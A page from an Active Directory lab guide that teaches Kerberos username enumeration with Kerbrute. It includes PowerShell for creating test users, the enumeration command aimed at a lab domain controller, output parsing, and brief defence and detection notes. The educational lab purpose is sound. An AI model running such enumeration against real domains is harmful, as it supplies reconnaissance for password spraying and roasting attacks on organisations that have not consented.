📖
Building a Windows AD lab
  • Building a Windows AD lab
  • Lab-setup
    • Lab overview
    • Building the lab
      • Prerequisite
      • Creating images
        • Optional: Install software & Settings
      • Network setup
      • Cloning & Creating VM's
      • Creating bank.local
        • Creating Domain Controller - DC01
          • Enable RDP
        • Creating amsterdam.bank.local
          • Creating Domain Controller - DC02
            • Creating a AD structure
            • Create a CA
            • Configure LDAPS
          • Creating Fileserver - FILE01
            • File services
          • Creating W10 client - WS01
            • PSRemoting
          • Creating Webserver - WEB01
            • Web Services
            • SQL Server
              • Create database
      • Creating secure.local
        • Creating Domain Controller - DC03
        • Creating File/SQL Server - DATA01
          • SQL Server
            • Create database
    • Attack Paths
      • Attack path 1 (hard)
        • Configuring
        • Tasks
        • Manual
      • Attack path 2
        • Configuring
        • Task
        • Manual
    • Troubleshooting
    • To-Do
  • Vulnerabilities & Misconfigurations & Attacks
    • Initial Access Attacks
      • Username Enumeration
        • Password Spraying
        • AS-REP Roasting
        • Empty Password
      • SMB Relaying
      • SMB Null-Session (To-Do)
      • SQL Server default login
    • Active Directory Attacks
      • Password spraying
      • AS-REP Roasting
      • Empty password
      • Password in description
      • Kerberoasting
      • Delegation Attacks
        • Unconstrained Delegation
          • Printerbug
        • Constrained Delegation
        • Resource Based Constrained Delegation
          • Computeraccount Takeover
          • Change-LockScreen
          • Webclient Attack (todo)
      • DACL-Abuses
        • Write Owner
        • Owns
        • WriteDacl
        • GenericAll
        • GenericWrite (todo)
        • ForceChangePassword
        • Add user to group (todo)
        • Targeted Kerberoast (todo)
        • Get-Changes
      • Reused local administrator (todo)
      • SQL Server Attacks (todo)
        • Initial Access
          • SQL Server default login
          • Normal domain user access
        • Privilege Escalation
          • Impersonation
          • DB-Owner
          • Enumerate Logins
            • Weak passwords
        • Executing Commands
        • Database-Links
        • Capturing hashes & Relaying
      • Reading LAPS passwords (todo)
      • Priviliged Groups (todo)
        • DNS-Admins (todo)
        • Account Operators (todo)
        • Backup Operators
        • Server Operators (todo)
      • Hopping domains and forests
        • Child to parent domain
          • Krbtgt hash
          • Trust key
        • Cross forest Attacks (todo)
          • Foreign user
    • Misc
      • Reverse shell trick
      • Lateral Movement
        • PSRemoting
        • PsExec (todo)
      • Misconfigured Service (todo)
        • Unqouted Service Path
      • Discovering Shares
      • Password on shares
      • Different methods of dumping credentials
        • LSASS (todo)
        • Dumping DPAPI
          • Browser passwords
        • Scheduled tasks (todo)
        • Services (todo)
        • Vssadmin Shadow Copy
      • ms-ds-machineaccountquota (todo)
      • add DNS Records (todo)
      • Bypassing UAC
    • Template page
  • Defence
    • Detection
    • Hardening
      • LDAP
        • LDAP Signing
        • LDAPS Binding
      • Strong Password Policy
      • Change who can join computers to the domain
      • Protected users group
      • Account is sensitive and cannot be delegated
      • Powershell Execution Policy
      • Template page
Powered by GitBook
On this page
  • Configuring
  • Creating users
  • Attacking
  • How it works
  • Executing the attack
  • Defending
  • Recommendations
  • Detection
  • References
Edit on GitHub
  1. Vulnerabilities & Misconfigurations & Attacks
  2. Initial Access Attacks

Username Enumeration

It is possible to enumerate valid usernames without authentication by sending TGT requests with no pre-authentication.

Configuring

  1. To implement the attack we need to create a couple users with easy guessable usernames. To do this we can choose some usernames from a popular list of usernames from the SecLists repository. We will create the following users:

john
david
robert
chris
mike
dave
richard
thomas
steve
mark

Creating users

2. Previously we created users by using the GUI. Now we will create users using PowerShell. Create the file users.txt and place the usernames in there. Then create the users:

# Place users in users.txt
cd C:\
notepad users.txt

# Creating users
$password = ConvertTo-SecureString 'ReallySecurePassword123!' -AsPlainText -Force
$files = Get-Content -Path C:\users.txt
ForEach ($name in $files) {
New-ADUser -Name "$name" -GivenName "$name" -SamAccountName "$name" -UserPrincipalName $name@amsterdam.bank.local -Path "OU=Employees,DC=amsterdan,DC=bank,DC=local" -AccountPassword $password -Enabled $true
}

3. Run the command below to get a list of all the users and check if the users are created:

Get-ADUser -Filter * | Select-Object Name

Attacking

How it works

To enumerate usernames, send TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists.

Source: https://github.com/ropnop/kerbrute#user-enumeration__

Executing the attack

  1. To enumerate usernames we can use the tool Kerbrute. To install Kerbrute on Kali download the latest release from GitHub and save it somewhere. I would recommend /opt.

2. For the list of usernames download the xato-net-10-million-usernames.txt list from SecLists.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt

3. After downloading the tool and the username list run Kerbrute against the domain amsterdam.bank.local and DC 10.0.0.3. Pipe the command to tee to save the output to the txt file username_enum.txt. 

./kerbrute_linux_amd64 userenum -d amsterdam.bank.local --dc 10.0.0.3 xato-net-10-million-usernames.txt | tee username_enum.txt

These valid users can be used for AS-REP roasting or Password Spraying Attacks. For now save these users to usernames.txt.

4. To only get a list of usernames execute the following which will cut the output to only get the usernames, changes everything to lowercase and sorting for unique entries:

cat username_enum.txt | grep bank.local | cut -d " " -f 8- | cut -d "@" -f 1 | sed 's/./\L&/g' | sort -u > users.txt

cat users.txt                                                                                                       
administrator
bank
chris
dave
david
john
mark
mike
richard
robert
steve
thomas

5. From here we can execute the following attacks to gain access to the domain:

Defending

Recommendations

  • I don't know any configurations to block the enumeration of usernames. The best way to block this is using a non traditional naming convention for the samaccountnames.

Detection

The attack generates the Windows event ID 4768 "A Kerberos authentication ticket (TGT) was requested" if Kerberos logging is enabled.

Work in Progress

References

PreviousInitial Access AttacksNextPassword Spraying

Last updated 2 years ago

Password Spraying
Empty Password
AS-REP Roasting
LogoGitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.GitHub
LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub